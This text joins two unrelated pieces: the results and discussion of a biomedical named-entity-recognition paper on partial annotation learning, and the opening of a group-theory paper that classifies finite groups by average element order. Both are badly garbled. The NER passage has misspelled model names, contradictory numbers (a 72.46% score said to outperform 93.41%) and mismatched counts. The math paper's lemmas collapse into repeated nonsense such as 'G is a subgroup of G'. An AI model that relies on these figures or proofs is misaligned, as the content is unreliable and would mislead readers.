continue until convergence. Another model is the EER-BERT model, proposed by Erlman and Collins (2021), which is the state-of-the-art partial annotation learning model, exceeding the results from Li et al. (2021) on 7 datasets. They integrated the Expected Entity Ratio loss, based on the assumption that the number of named entity tags over the entire distribution of sentences occur at relatively stable proportion. We note that we chose the state-of-the-art biomedical language model PubMedHERET as the backbone model for all the pre-trained language model-based computer systems. For example, we adapted the EER-BERT model to the EER-PubMedHERET model to convert the original RoBERTa to PubMedHERET, to make the comparison as fair as possible. ### 3.4 Corpora compilation and pre-processing Training deep architectures usually requires large amounts of annotated gold standard data, posing a problem to applications in the biomedical domain, where corpora sometimes contain less than 500 sentences. And they are varying in dataset size, entry distribution, genre (e.g. patents vs. scientific articles), and text type (e.g. abstract vs. full text). In order to obtain solid evaluation results, we compile the small gold standard data sets into a large collection of biomedical NER datasets following HuftPair (Wu et al., 2021). Specifically, we take into consideration the influence of corpus size and other implicit factors such as the distribution of entity mentions, and sentence length, and performed our evaluations for one entity types: gene/proteins, chemicals, diseases, cell lines, and species. Weber et al. successively proposed IDUNE (Weber et al., 2021) and HuftPair (Weber et al., 2021), small-and-tune biomedical entity recognition stages covering the above-mentioned entity types. Following their work, we integrate 159 gold-standard biomedical NER corpora using a consistent format to the fully annotated datasets for our experiments, excluding eight corpora1 that we don't have access to, and the BioSemantics corpus which contains a large number of very long sentences. Footnote 1: Arizona Disease, BioInfer, CLL, GELLUS, BEPA, LINNEIAUS, Quitis v.1,2, Variome Anabology to the data preprocessing pipeline of HUNER for each entity type, we aggregate the corresponding corpora which contain annotations for the respective entity type to learn a type-specific model and convert them into the standard CoNLL2003 format. In addition, we re-use the traninderist vetglits introduced by HUNER to split each resulting corpora for each entity type with a ratio of 60:10:30 among the splits. Subsequently, we convert the BIO encoding scheme in the standard CoNLL2003 format into BILOU (beginning, inside, last, outside, unit) encoding scheme, which was observed to outperform the widely adopted BIO encoding scheme for NER. We note that splitting is carried out in a deterministic way and there is no overlap among them across corpora for the same entity type to avoid knowledge leaks. Table 1 highlights important statistics of the corpora for the five entity types. As we can see, the distribution of corpora varies among different entity types. Take training corpora as an example. The corpora size varies between 12:592 sentences for cell lines and 99:007 sentences for chemicals. The number of entity annotations varies between 2,500 for cell lines and 114:575 for chemicals. The number of surface forms varies between 1,419 for cell lines and 29:908 for chemicals. The distribution of the number of tokens in sentences among the training corpora for the entity types can be found in supplementary materials (Supplementary Fig. S1). ### 3.5 Partial annotation scenarios simulation In this research, one of our goals is to explore the capability of partial annotation learning models to effectively mitigate the unlabeled entity problem (Li et al., 2021). We assume that partial annotations for the NER task can be obtained by removing entity annotations from the fully annotated dataset and consider for entity removal schemes to simulate unlabeled entity problems in real-world situations. Noted that we only remove entity annotations in the train set and keep the golden truth der set and test set to acquire accurate evaluation results. The first scheme is "Remove Annotations Randomly" (RAR), previously used by Ji et al. (2019); Li et al. (2021), which drops entity annotations uniformly at random. By setting the entity removal rate we record the number of removal entity annotations. For example, \(r=0.1\) means that we remove 10% of all entity annotations randomly in the dataset and keep 90% of entity annotations. The drawback of this scheme is that the entity removal process is incomplete, with a diverse set of future terms of the removal entity annotations still occurring in the dataset, which is not realistic under certain circumstances (Elland and Collins, 2021). The second scheme is "Remove All Annotations for Randomly Selected Surface Forms" (RSFR), which is used by Mayhew _et al._ (2019) and is a more realistic yet more challenging scheme to learn from RSFR scheme can be regarded as a simulation of distantly supervised NER, wherein entity mentions not occurring in the dictionary will consistently not be annotated in the whole dataset. To simulate data for this scenario, we group annotations by their surface forms and randomly select groups of annotations to remove, as the literal meaning of this scheme. To allow for a fair comparison with the RAR scheme, we downsample annotations grouped by surface forms until the number of removed entity annotations is roughly the same under both schemes at the same entity removal rate. Fig. 3 provides a schematic comparison of these two schemes as an illustration. The pseudo-codes for the RAR and RSFR algorithm, and the changing of the number of annotations in the dataset along entity removal rate can be found in the supplementary materials (Section B). ## 4 Experiments To verify the adaptiveness of our proposed method, we conduct experiments based on the combination of three settings: entity type, entity removal rate, and entity removal scheme, detailed below. ### Experimental design For each entity type, we generated synthetic datasets from the original fully annotated dataset by randomly removing entity annotations based on the combination of entity removal rate and entity removal scheme. The entity removal rate was set as 0.1, 0.2,..., 0.9. For each combination, we removed entity annotations from the original dataset with five different random seeds to account for the variance in model performance over different runs. In this way, 9 (entity removal rate) x 2 (entity removal scheme) x 5 (random seed) x 5 (entity type) x 4 (model) = 1.800 experiments were conducted. Furthermore, for each entity type, we applied a PubMedBERT paper on the original fully annotated dataset to provide an upper-bound model performance, which we did not expect any of the other methods to outperform. In our work, we use the entity-level precision, recall and F1-score as the evaluation metrics to evaluate model performance, which means that the model performance is measured by its ability to correctly identify the boundary of entities and classify them in their category. The detailed experimental settings can be found in supplementary materials (Supplementary section B). ### Overall Results Fig. 4 displays the comprehensive results of our empirical investigations, wherein the results are aggregated across five entity types and averaged over five independent random seeds. We have utilized a 95% confidence interval to ensure the robustness of our findings. In order to classify the results obtained, a removal rate of 0.5 is employed, resulting in two distinct groups: a low removal rate group (0.1-0.5) and a high removal rate group (0.6-0.9). Model performance is then evaluated for both of these groups under two entity removal schemes, as shown in Table 2. Additionally, to provide detailed insights into the model's performance on each entity type, we have also recorded the corresponding F1-score, precision, and recall in (Supplementary Fig. 53, Fig. 54, Fig. 55). We provide the full experimental results in (Supplementary Table 51). Based on these results, we can make the following observations. Secondly, our approach is effective to eliminate the misguidance brought by unlabeled entities, surpassing the prior state-of-the-art full annotation learning PubMedBERT trigger under both entity removal schemes. As we can see from Table 2, our model significantly outperforms the PubMedBERT target, especially in high removal rates. Under the RAR scheme, our model achieves 72.46% F1 score for high removal rate group, outperforming PubMedBERT target 93.41%. Taking the results for one entity type as an example, on the Chemicals dataset, and under the RAR scheme, our F1 score exceeds that PubMedBERT trigger by 8.34% when the removal rate is 0.5, 48.51% when the removal rate is 0.7 and 75.23% when the removal rate is 0.9. On the Species dataset, our model can achieve the F1 score of 65.53% under the RAR scheme and 50.88% under the RSFR scheme with only nearly 800 entity annotations (entity removal rate is equal to 0.99), whereas the PubMedBERT trigger can't acquire enough information to train the model, getting F1 score of 9.46% and 15.09% correspondingly. Thirdly, compared with the commonly used partial annotation learning model BILSTH-Partial-CRF, our model exhibits a widening gap in the F1 score as the entity removal ratio increases. Taking the Disease dataset as an example, under the RAR scheme, the F1 score gap between our model and the BILSTH-Partial-CRF model is 8.48% when the entity removal rate is 0.7 and 64.82% when the entity removal rate is 0.9. This suggests that adopting a pretraining language model as the encoder for a partial annotation learning model might play an essential role in mitigating the Figure 4: The overall Precision, Recall, and F1-score on the test set aggregated over all entity types. The whole figure contains 6.0 rows \(\times\) 2. columnwise weights, where each column is the group of the results for the corresponding entity removal scheme. In each subplot, the horizontal axis denotes the entity removal rate, and the vertical axis denotes the underlying evaluation metric. unlabeled entity problem under high entity missing rates. Further, as we can see from Supplementary Fig. 53, our model performs on par with the state-of-the-art spatial annotation learning model ERF_PubMLBERT on average, while achieving overall better results under the RSFR scheme except on Cell Lines dataset. There are modest improvements compared to the ERF_PubMLBERT model under the RSFR scheme, especially on a high missing entity ratio. For example, on the disease dataset, our model outperforms EER_PubMLBERT by 16.52% when the entity removal rate is equal to 0.9. Fourthly, the RSFR entity removal scheme, which is more realistic, is also more challenging compared to the RAR scheme. For the RAR scheme, the partial annotation learning model can mitigate the unlabeled entity problem well when the entity removal rate is small, while the model performance starts to decline at the initial stage of removing entity annotations with the RSFR scheme. Fig. 4 demonstrates a stronger relationship between the removal rate and FI score for the RSFR scheme, which has a steeper slope compared with the RAR scheme, indicating that even a small ratio of missing entity annotations increase the difficulty of model learning. On the Disease dataset and in entity removal rate 0.9, our model can acquire the FI score of 80.32% under the RAR scheme which is almost close to the upper bound 85.17%, while only 71.71% for the RSFR scheme. In addition, Maghew et al. (2019) proposed adding false positive labels as noise to explore the effectiveness of the partial annotation learning model under this scenario, which is also valuable to explore. We will leave this investigation to future work. Finally, as we can see from Fig.4, the F1 score score of each subplot is roughly similar in shape to that of recall, and the precision remains relatively high even for full annotation learning model under high removal rate, suggesting that the model performance is mostly described by the recall. The advantage of partial annotation learning models is that even with a large number of missing entity annotations, they can circumvent all possible unlabeled entities to achieve high recall with a little sacrifice to precision compared to the full annotation learning model. ## 5 Discussion ### Effects of partial annotation learning It is instructive to compare partial and full annotation learning models. For all five entity types we evaluate, partial annotation learning methods on average have better FI scores when compared to the full annotation learning model, as the removal rate gets higher. The full annotation learning model can achieve good results when there are few missing entity annotations, while as the number of missing entity annotations increases, the advantage of partial annotation learning models begins to emerge. As we can see from Table 2, the PubMedHEET trigger consistently achieves the best precision regardless of entity removal rate and entity removal method. While is recall drops sharply when the removal rate changes from too high, with recall declining from 70.26% to 19.55% under the R&AR scheme and from 57.46% to 20.51% under the RSFR scheme. The BiLSTM-Partial-CRF model, which is a partial annotation learning model, quantifies whether no particular knowledge from pretraining and Transformer architecture, starts to show effectiveness under high removal rates. The BiLSTM-Partial-CRF model achieves a similar FI score compared to PubMedHEET trigger under low removal rates but outperforms PubMedHEET trigger under low removal rates but outperforms PubMedHEET trigger by 13.64% for high removal rates under the RAR scheme. As we can see from Fig. 4, the performance of BiLSTM-Partial-CRF strategy exceeds that of the PubMedHEET when the entity removal rate increases to nearly 0.4. For our model and the EER_PubMLBERT model, the effectiveness of partial annotation learning starts to show even at a low removal rate, especially under the RSFR scheme. Our model improves over the PubMedHEET trigger by 5.97% under the RSFR scheme for a low removal rate, verifying the effectiveness of partial annotation learning. As we can see, there is still a gap between the state-of-the-art (SOTA) fully annotated learning methods and the partial annotation learning module under low missing rate. Although significant progress has been made by partial annotation learning methods, they sacrifice precision to achieve proportionally higher recall. This indicates that it could be a promising option to construct a NER pipeline to achieve better overall model performance in practical applications, by using partial annotation learning to recall entity annotations first and then using a full annotation learning model to further improve precision. ### Effects of entity distribution among datasets As we can see from Table 1, the entity distribution varies among datasets, which will affect the models' sensitivity to fluctuations in the partially annotated training data. The Cell lines and Species datasets have relatively sparse entity distributions with a small number of training instances and fewer entity annotations. As illustrated in Supplementary Fig. 53, Fig. 54, and Fig. 55, we find that the precise scores for our model on these two datasets are severely lower than that of the upper bound, while the recall scores are notably above that of the upper bound overall. After balancing between precision and recall, FI scores on these two datasets are relatively stable across different removal rates regardless of the entity removal schemes. While the slopes of our model FI score on the other three datasets under the RSFR scheme are apparently higher, suggesting that our model is more inclined to overall entity-dense datasets as the increase of missing entities under the RSFR scheme. This demonstrates that it's important to consider the precision/recall trade-off for partial annotation learning models. Furthermore, partial annotation learning models are sensitive to entity-squared datasets, which we can see from the confidence interval range. The confidence interval range is relatively higher on the Cell Lines and Species dataset compared to the other three datasets no matter the entity removal scheme used. ## 6 Conclusion In this work, we present the TS-PubMedHEET-Partial-CRF architecture, a NER model based on partial annotation learning designed for dealing with the unlabeled entity problem in NER, and explore its effectiveness in BioRNet. Considering missing entity ratios and different annotation scenarios, we designed a set of empirical experiments on five Biomedical entities including Cell Lines, Diseases, Genes, Chemicals and Species, and compared them against the three partial annotation learning methods (TS-PubMedHEET-Partial-CRF, BiLSTM-Partial-CRF, EER_PubMLBERT), and the state-of-the-art full annotation learning PubMedHEET trigger. Our results strongly confirm the feasibility and robustness of partial annotation learning, which shows a strong capacity to learn from partially annotated corpora even under extreme conditions. A limitation of our work is that we do not conduct ablation experiments to verify the effectiveness of each separate modification, e.g., self-training loss, which we intend to explore in future work. This study aims to provide insights into the best practices for partial annotation learning in biomedical information extraction and help practitioners make informed decisions when dealing with partially annotated data in real-world applications. ## Acknowledgements We acknowledge the support of Tian-Yuan Huang for drawing the figures. ## Funding This work is supported by the China Scholarship Council (CSC).
2307.15328
Characterizing some finite groups by the average order
The average order of a finite group G is denoted by o(G). In this note, we classify groups whose average orders are less than o(S4), where S4 is the symmetric group on four elements. Moreover, we prove that G \cong S4 if and only if o(G) = o(S4). As a consequence of our results we give a characterization for some finite groups by the average order. In [9, Theorem 1.2], the groups whose average orders are less than o(A4) are classified. It is worth mentioning that to get our results we avoid using the main theorems of [9] and our results leads to reprove those theorems.
Ashkan Zarezadeh, Behrooz Khosravi, Zeinab Akhlaghi
2023-07-28T06:06:57Z
http://arxiv.org/abs/2307.15328v1
# Characterizing some finite groups by the average order ###### Abstract. The average order of a finite group \(G\) is denoted by \(\mathrm{o}(G)\). In this note, we classify groups whose average orders are less than \(\mathrm{o}(S_{4})\), where \(S_{4}\) is the symmetric group on four elements. Moreover, we prove that \(G\cong S_{4}\) if and only if \(\mathrm{o}(G)=\mathrm{o}(S_{4})\). As a consequence of our results we give a characterization for some finite groups by the average order. In [9, Theorem 1.2], the groups whose average orders are less than \(\mathrm{o}(A_{4})\) are classified. It is worth mentioning that to get our results we avoid using the main theorems of [9] and our results leads to reprove those theorems. Key words and phrases:Element order, sum of element orders, average order, characterization 2000 Mathematics Subject Classification: 05C25, 05C69, 94B25 The first author is supported by a grant from IPM (No. 1402200112) ## 1. Introduction For a finite group \(G\), \(\psi(G)\) was first introduced in [1], which denotes the sum of the element orders of \(G\), i.e., \(\psi(G)=\sum\limits_{x\in G}o(x)\). Later the average order of \(G\) was defined as, \(\mathrm{o}(G)=\frac{\psi(G)}{|G|}\). At first glance, these quantities are not expected to inform us much about the structure of \(G\). As an example, \(\psi(A_{4})=\psi(D_{10})=31\), and also \(\mathrm{o}(D_{12})=\mathrm{o}(C_{4})=2.75\). If \(G\) is a group such that there exist(s) exactly \(k\) non-isomorphic groups with average order \(\mathrm{o}(G)\), then we say \(G\) is _k-recognizable by average order_. A \(1\)-recognizable group is called _characterizable_. In [5], it is conjectured that \(\mathrm{o}(G)<\mathrm{o}(A_{5})\), guaranties the solvability of \(G\), which turned out to be true when Herzog, Longobardi and Maj proved it in [3]. In that paper, they also classified all finite groups with \(\mathrm{o}(G)\leq\mathrm{o}(S_{3})\). Later in [4], they proved that \(A_{5}\) is characterizable by average order, meaning that \(\mathrm{o}(G)=\mathrm{o}(A_{5})\) implies \(G\cong A_{5}\). Meanwhile Tarnauceanu in [9], classified all finite groups with \(\mathrm{o}(G)\leq\mathrm{o}(A_{4})\), where he stated that if \(\mathrm{o}(G)<\mathrm{o}(A_{4})\), \(G\) would be supersolvable, and \(\mathrm{o}(G)=\mathrm{o}(A_{4})\) leads to \(G\cong A_{4}\). As the main result of this paper, inspired by the above results, we determine the groups whose average orders are less than \(2.8\). Note that the bound \(2.8\) is close to \(\mathrm{o}(S_{4})=\frac{67}{24}\approx 2.791\). As a consequence, we give a new characterization for some finite groups using the average order. As the main result, we prove the following theorem: **Main Theorem**: Let \(G\) be a finite group satisfying \(\mathrm{o}(G)<2.8\). Then \(G\) is isomorphic to one of the following groups: 1. \(D_{12}\); 2. \(S_{4}\); 3. \(C_{3}\) or \(C_{3}\times C_{3}\); 4. \(C_{2}^{2k}\rtimes C_{3}\), for some natural number \(k\), which is a Frobenius group; 5. a \(2\)-group of one of the following types, where \(E\cong C_{2}^{m}\), for some \(m\geq 0\): 1. \(C_{4}\); 6. \(D_{8}\times E\); 7. an elementary abelian \(2\)-group; 8. \(D(C_{4}\times C_{4})\times E\), where \(D(C_{4}\times C_{4})\) is the generalized dihedral of \(C_{4}\times C_{4}\); Introduction Let \(G\) be a group, and \(H\) a non-trivial normal subgroup of \(G\). 1. For each \(x\in G\) and \(h\in H\), \(o(xH)\mid o(xh)\), 2. \(\frac{\psi(H)-|H|}{|G|}+\mathrm{o}(\frac{G}{H})\leq\mathrm{o}(G)\). In particular, \(\mathrm{o}(\frac{G}{H})<\mathrm{o}(G)\). **Lemma 1.1**: _Let \(G\) be a group and \(H\) a non-trivial normal subgroup of \(G\). Then \(G\) is a subgroup of \(G\)._ 1. _For each_ \(x\in G\) _and_ \(h\in H\)_,_ \(o(xH)\mid o(xh)\)_,_ 2. \(\frac{\psi(H)-|H|}{|G|}+\mathrm{o}(\frac{G}{H})\leq\mathrm{o}(G)\)_. In particular,_ \(\mathrm{o}(\frac{G}{H})<\mathrm{o}(G)\)_._ **Proof.** Let \(G\) be a group and \(H\) a non-trivial normal subgroup of \(G\). Then \(G\) is a subgroup of \(G\). If \(G\) is a subgroup of \(G\), then \(G\) is a subgroup of \(G\). **Lemma 1.2**: _Let \(G\) be a group and \(H\) a non-trivial normal subgroup of \(G\). Then \(G\) is a subgroup of \(G\)._ 1. _For each_ \(x\in G\) _and_ \(h\in H\)_,_ \(o(xH)\mid o(xh)\)_,_ 2. \(\frac{\psi(H)-|H|}{|G|}+\mathrm{o}(\frac{G}{H})\leq\mathrm{o}(G)\)_. In particular,_ \(\mathrm{o}(\frac{G}{H})<\mathrm{o}(G)\)_._ **Proof.** Let \(G\) be a group and \(H\) a non-trivial normal subgroup of \(G\). Then \(G\) is a subgroup of \(G\). If \(G\) is a subgroup of \(G\), then \(G\) is a subgroup of \(G\). **Lemma 1.3**: _Let \(G\) be a group and \(H\) a non-trivial normal subgroup of \(G\). Then \(G\) is a subgroup of \(G\)._ 1. _For each_ \(x\in G\) _and_ \(h\in H\)_,_ \(o(xH)\mid o(xh)\)_,_ 2. \(\frac{\psi(H)-|H|}{|G|}+\mathrm{o}(\frac{G}{H})\leq\mathrm{o}(G)\)_. In particular,_ \(\mathrm{o}(\frac{G}{H})<\mathrm{o}(G)\)_._ **Proof.** Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\). If \(G\) is a subgroup of \(G\), then \(G\) is a subgroup of \(G\). **Lemma 1.4**: _Let \(G\) be a group and \(H\) a non-trivial normal subgroup of \(G\). Then \(G\) is a subgroup of \(G\)._ 1. _For each_ \(x\in G\) _and_ \(h\in H\)_,_ \(o(xH)\mid o(xh)\)_,_ 2. \(\frac{\psi(H)-|H|}{|G|}+\mathrm{o}(\frac{G}{H})\leq\mathrm{o}(G)\)_. In particular,_ \(\mathrm{o}(\frac{G}{H})<\mathrm{o}(G)\)_._ **Proof.** Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\). If \(G\) is a subgroup of \(G\), then \(G\) is a subgroup of \(G\). **Lemma 1.5**: \(G\) _is a subgroup of \(G\)._ 1. _For each_ \(x\in G\) _and_ \(h\in H\)_,_ \(o(xH)\mid o(xh)\)_,_ 2. \(\frac{\psi(H)-|H|}{|G|}+\mathrm{o}(\frac{G}{H})\leq\mathrm{o}(G)\)_. In particular,_ \(\mathrm{o}(\frac{G}{H})<\mathrm{o}(G)\)_._ **Proof.** Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\). If \(G\) is a subgroup of \(G\), then \(G\) is a subgroup of \(G\). **Lemma 1.6**: _Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\)._ 1. _For each_ \(x\in G\) _and_ \(h\in H\)_,_ \(o(xH)\mid o(xh)\)_,_ 2. \(\frac{\psi(H)-|H|}{|G|}+\mathrm{o}(\frac{G}{H})\leq\mathrm{o}(G)\)_. In particular,_ \(\mathrm{o}(\frac{G}{H})<\mathrm{o}(G)\)_._ **Proof.** Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\). If \(G\) is a subgroup of \(G\), then \(G\) is a subgroup of \(G\). **Lemma 1.7**: _Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\)._ 1. _For each_ \(x\in G\) _and_ \(h\in H\)_,_ \(o(xH)\mid o(xh)\)_,_ 2. \(\frac{\psi(H)-|H|}{|G|}+\mathrm{o}(\frac{G}{H})\leq\mathrm{o}(G)\)_. In particular,_ \(\mathrm{o}(\frac{G}{H})<\mathrm{o}(G)\)_. In particular,_ \(\mathrm{o}(\frac{G}{H})<\mathrm{o}(G)\)_._ **Proof.** Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\). If \(G\) is a subgroup of \(G\), then \(G\) is a subgroup of \(G\). **Lemma 1.8**: _Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\)._ 1. _For each_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_._ 2. _For each_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_._ 3. _For each_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_._ Proof.: Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\). If \(G\) is a subgroup of \(G\), then \(G\) is a subgroup of \(G\). **Lemma 1.9**: _Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\)._ 1. _For each_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_._ 2. _For each_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_,_ \(x\in G\)_._ Proof.: Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\). If \(G\) is a subgroup of \(G\), then \(G\) is a subgroup of \(G\). **Lemma 1.10**: _Let \(G\) be a subgroup of \(G\). Then \(G\) is a subgroup of \(G\)._ 1. _For each_ \(x\in G\) _and_ \(h\in H\)_,_ \(o(xH)\mid o(xh)\)_,_ \(x\in G\ Therefore, \({\rm o}(G)\) can not be equal to 2.4, 2.8, 3.6, or any even integer, for any finite group \(G\). **Lemma 2.5**: _Let \(G\) be a finite nilpotent group. Then the following statements hold._ 1. _If_ \(|\pi(G)|>1\)_, then_ \({\rm o}(G)\geq{\rm o}(C_{6})=3.5\)_, and if_ \(G\not\cong C_{6}\)_, then_ \({\rm o}(G)>4\)_._ 2. _If_ \(|G|>5\) _is odd and_ \(G\) _is not a_ \(3\)_-group, then_ \({\rm o}(G)\geq{\rm o}(C_{5}^{2})=4.84\)_._ _Proof._\((i)\) By [3, Lemma 1.1], if \(\pi(G)=\{p_{1},p_{2},...,p_{n}\}\), then \({\rm o}(G)=\prod\limits_{1\leq i\leq n}o(P_{i})\), where \(P_{i}\in{\rm Syl}_{p_{i}}(G)\). If \(|G|\) has a prime divisor \(p\geq 5\), then \(G\) has a quotient isomorphic to its Sylow \(p\)-subgroup, say P, and since \({\rm o}(P)\geq{\rm o}(C_{p})>4\), the statement holds. Hence, we may assume that \(\pi(G)=\{2,3\}\). If \(G\not\cong C_{6}\), then \(12\mid|G|\) or \(18\mid|G|\). Therefore, \({\rm o}(G)\geq{\rm o}(C_{2}^{2}){\rm o}(C_{3})>4\). \((ii)\) If \(|G|\) has a prime divisor \(p\geq 7\), then \(G\) has a quotient isomorphic to its Sylow \(p\)-subgroup, say \(P\), and since \({\rm o}(P)\geq{\rm o}(C_{p})>6>{\rm o}(C_{5}^{2})\), the statement holds. Otherwise, \(\pi(G)=\{5\}\), or \(\pi(G)=\{3,5\}\). In the first case, \(G\) is a \(5\)-group and as \(|G|>5\), the statement holds. In the second case, since \(G\) has a factor, isomorphic to \(C_{15}\), we have \({\rm o}(G)\geq{\rm o}(C_{15})=9.8>{\rm o}(C_{5}^{2})\). **Lemma 2.6**: _Let \(G\) be a finite group and \(H\) a subgroup of \(G\)._ 1. _If_ \(H\) _is of index_ \(2\)_, and_ \({\rm o}(H)>3.6\)_, then_ \({\rm o}(G)>2.8\)_._ 2. _If_ \(H\) _is a normal subgroup of index_ \(3\) _and_ \({\rm o}(H)>2.4\)_, then_ \({\rm o}(G)>2.8\)_._ _Proof._\((i)\) As \(G=H\cup xH\), for some \(x\in G\setminus H\), we have, \({\rm o}(G)\geq\frac{\psi(H)+2|H|}{2|H|}=\frac{{\rm o}(H)}{2}+1>2.8\). The proof of \((ii)\) is similar to \((i)\). By Lemma 2.1, \({\rm o}(G)\geq\frac{\psi(H)+6|H|}{3|H|}=\frac{{\rm o}(H)}{3}+2>2.8\), as wanted. **Lemma 2.7**: _Let \(M\) be a subgroup of index \(2\) of a finite group \(G\). If \(n_{2}(G\setminus M)>2|M|/3=|G|/3\), then \(M\) is nilpotent._ _Proof._ Let \(x\in G\setminus M\) be an involution and \(\tau_{x}\in{\rm Aut}(M)\), such that for each \(m\in M\), \(\tau_{x}(m)=m^{x}\). Note that \(\tau_{x}\) maps \(m\in M\) to its inverse if and only if \(o(xm)=2\). Since \(n_{2}(G\setminus M)>2|M|/3\), we get that \(\tau_{x}\) maps more than \(\frac{2}{3}\) of the elements of \(M\) to their inverses. As, \(r(M,\tau_{x})>\frac{2}{3}\geq\frac{2}{p+1}\), for any prime number \(p\), by Lemma 2.2, \(M\) is nilpotent. ## 3. main results **Lemma 3.1**: _Let \(G\) be a finite group and \(m>1\) be an odd integer._ 1. _If_ \(|G|=2m\)_, then_ \({\rm o}(G)\geq{\rm o}(D(C_{5}\times C_{5}))=3.42\)_, unless_ \(G\cong D(C_{3}^{k})\)_, for some integer_ \(k\)_, or_ \(G\cong D_{10}\)_._ 2. _If_ \(|G|=4m\)_, then_ \({\rm o}(G)>3\)_, unless_ \(G\cong A_{4}\) _or_ \(D_{12}\)_._ _Proof._\((i)\) Let \(N\) be the Hall \(2^{\prime}\)-subgroup of \(G\), and \(G=N\cup xN\), for some involution \(x\in G\setminus N\). Note that \(N\) is a group of odd order, so by [3, Lemma 1.1], \({\rm o}(N)\geq{\rm o}(C_{3})=\frac{7}{3}\). Note that for any \(n\in N\), \(o(xn)=2\) if and only if \(n^{x}=n^{-1}\). Hence, by [2, Lemma 10.4.1], \(n_{2}(xN)=n_{2}(G\setminus N)\) is a divisor of \(|N|\). If \(n_{2}(G\setminus N)\leq\frac{|N|}{3}=\frac{|G|}{6}\), then \(\psi(xN)\geq 2n_{2}(xN)+6(|N|-n_{2}(xN))\geq 2\frac{|G|}{6}+6\frac{|G|}{3}=\frac{7}{3}|G|\). Thus, \({\rm o}(G)\geq\frac{{\rm o}(N)}{2}+\frac{7}{3}\geq\frac{7}{6}+\frac{7}{3}=3.5\). If \(n_{2}(G\setminus N)>\frac{|N|}{3}\), we see that \(n_{2}(xN)=|N|\). So \(\langle x\rangle\) acts Frobeniusly on \(N\). Therefore, \(N\) is abelian. First assume that \(N\) is a \(3\)-group. If \({\rm exp}(N){>3}\), then \(N\) has a quotient isomorphic to \(C_{9}\), and so \({\rm o}(N)\geq{\rm o}(C_{9})>6\). Hence, \({\rm o}(G)=\frac{{\rm o}(N)}{2}+1>3+1=4\). Otherwise, \({\rm exp}(N){=3}\), and so \(G\cong D(C_{3}^{k})\), for some \(k\), as wanted. If \(N\) is not a \(3\)-group and \(m>5\), then by Lemma 2.5\((ii)\), \({\rm o}(N)\geq{\rm o}(C_{5}\times C_{5})=4.84\), and so \({\rm o}(G)=\frac{{\rm o}(N)}{2}+1\geq 2.42+1=3.42\). Finally, for \(m=5\), \(G\cong D_{10}\), and \({\rm o}(D_{10})=3.1\), as desired. \((ii)\) Let \(Q\in\operatorname{Syl}_{2}(G)\). If \(Q\) is cyclic, then \(G\cong N\rtimes Q\), where \(N\) is the Hall \(2^{\prime}\)-subgroup of \(G\). Since \(N\) is of odd order, \(\operatorname{o}(N)\geq\operatorname{o}(C_{3})=\frac{7}{3}\). By Lemma 2.1, \(\operatorname{o}(G)\geq\frac{\operatorname{o}(N)}{4}+\frac{10}{4}\geq\frac{7}{ 12}+\frac{10}{4}=\frac{37}{12}>3\). Now, assume that \(Q\) is not cyclic. Let \(m=3\). For the nilpotent groups of order \(12\), by Lemma 2.5, \(\operatorname{o}(G)>3\). Looking at the non-nilpotent groups of order \(12\) with non-cyclic Sylow \(2\)-subgroups, we see that the only possibilities are \(D_{12}\) and \(A_{4}\). From now on, we assume that \(m\geq 5\), and by induction on \(m\), we prove that \(\operatorname{o}(G)>3\). Note that by [3, Theorem C], if \(G\) is non-solvable, then \(\operatorname{o}(G)>\operatorname{o}(A_{5})>3.5\), and the result holds. If \(G\) is solvable, there exists a maximal normal subgroup \(M\) of index \(p\), for some prime \(p\). From the fact that \(p-1+\frac{1}{p}=\operatorname{o}(C_{p})=\operatorname{o}(\frac{G}{M})< \operatorname{o}(G)\), if \(p\geq 5\), we get that \(\operatorname{o}(G)>3\). In the sequel, we consider \(p\in\{2,3\}\). Checking by **GAP**, we get that the statement holds for groups of order \(36\) and so in the following we may assume that \(|G|\neq 36\). Now we consider the following cases. **Case 1)** If \(p=2\), then \(G\) has a normal \(2\)-complement, say \(K\). Let \(K_{0}\leq K\) be a minimal normal subgroup of \(G\). If \(K_{0}<K\), we have \(|G:K_{0}|=4m^{\prime}\), where \(m^{\prime}\geq 3\). If \(m^{\prime}\geq 5\), by the induction hypothesis, \(\operatorname{o}(G)>\operatorname{o}(G/K_{0})>3\). Let \(m^{\prime}=3\). So, \(|G:K_{0}|=12\). Note that since \(A_{4}\) does not have a normal \(2\)-complement, \(G/K_{0}\ncong A_{4}\). If \(G/K_{0}\ncong D_{12}\), then by the discussion we had for groups of order \(12\), \(\operatorname{o}(G)>\operatorname{o}(G/K_{0})>3\). Otherwise, \(G/K_{0}\cong D_{12}\). Let \(M\) be a subgroup of \(G\) such that \(M/K_{0}\cong C_{6}\). So, \(\operatorname{o}(M)>\operatorname{o}(C_{6})=3.5\). If \(n_{2}(G\setminus M)\leq|G|/3\), then \(\operatorname{o}(G)\geq\frac{\psi(M)+2|G|/3+6|G|/6}{|G|}\geq\frac{7}{4}+\frac{ 5}{3}>3\). Otherwise, \(n_{2}(G\setminus 